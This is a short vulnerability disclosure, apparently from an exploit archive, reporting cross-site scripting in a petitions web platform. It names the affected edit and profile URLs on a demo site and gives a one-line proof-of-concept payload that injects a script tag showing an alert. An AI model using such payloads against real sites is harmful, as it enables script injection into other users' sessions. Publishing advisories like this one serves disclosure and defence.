<------------------ header data start ------------------- >

#############################################################

# Application Name : Petitions platform

# Vulnerable Type : Cross-Site Scripting

# Bug Fix Advice : Harmful characters can be filtered out.

# Vendor Homepage : http://demo.petition.smailio.ro

# Author : Cyber-Warrior | Bug Researchers Group | HighVoltage

# Author Contact : https://twitter.com/VatanSavunmasi

# Tested on Demo Site : http://demo.petition.smailio.ro

# Exploit : http://demo.petition.smailio.ro/edit
http://demo.petition.smailio.ro/profile/petitions/signed
http://demo.petition.smailio.ro/profile/petitions/my-petitions


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

><Script>alert(’XSS’);</Script>

< -- bug code end of -- >